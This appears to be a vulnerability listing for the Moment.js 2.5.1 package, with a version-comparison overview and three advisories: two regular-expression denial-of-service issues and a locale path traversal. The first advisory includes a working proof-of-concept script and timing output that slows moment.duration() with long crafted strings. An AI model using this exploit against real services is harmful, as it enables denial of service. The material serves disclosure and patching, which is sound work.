Moment.js version 2.5.1, released on January 22, 2014, presents a minor update over its predecessor, version 2.5.0 released on December 23, 2013, both maintained by Iskren Ivov Chernev. Primarily focused on date parsing, manipulation, and display, these libraries offer developers powerful tools for handling time in JavaScript applications. While the core functionalities remain consistent, a key difference lies in the development dependencies introduced in the 2.5.1 release. Specifically, version 2.5.1 incorporates testing and automation tools such as Karma, along with related plugins like karma-nodeunit, karma-sauce-launcher, karma-chrome-launcher and karma-firefox-launcher. Also, the grunt-karma plugin has been included.These changes, while not impacting the core API exposed to end-users, signify improvements in the library's testing infrastructure, ensuring higher code quality and cross-browser compatibility. For developers using Moment.js, the update from 2.5.0 to 2.5.1 promises a more robust and reliable library due to enhanced automated testing which are not present in the previous 2.5.0 version, although the API and usage patterns remain largely the same reducing the friction for upgrading. If your project already has a solid testing setup, the upgrade might not seem critical, but for projects that require high stability and wider browser compatibility, upgrading to 2.5.1 is recommended.
All the vulnerabilities related to the version 2.5.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: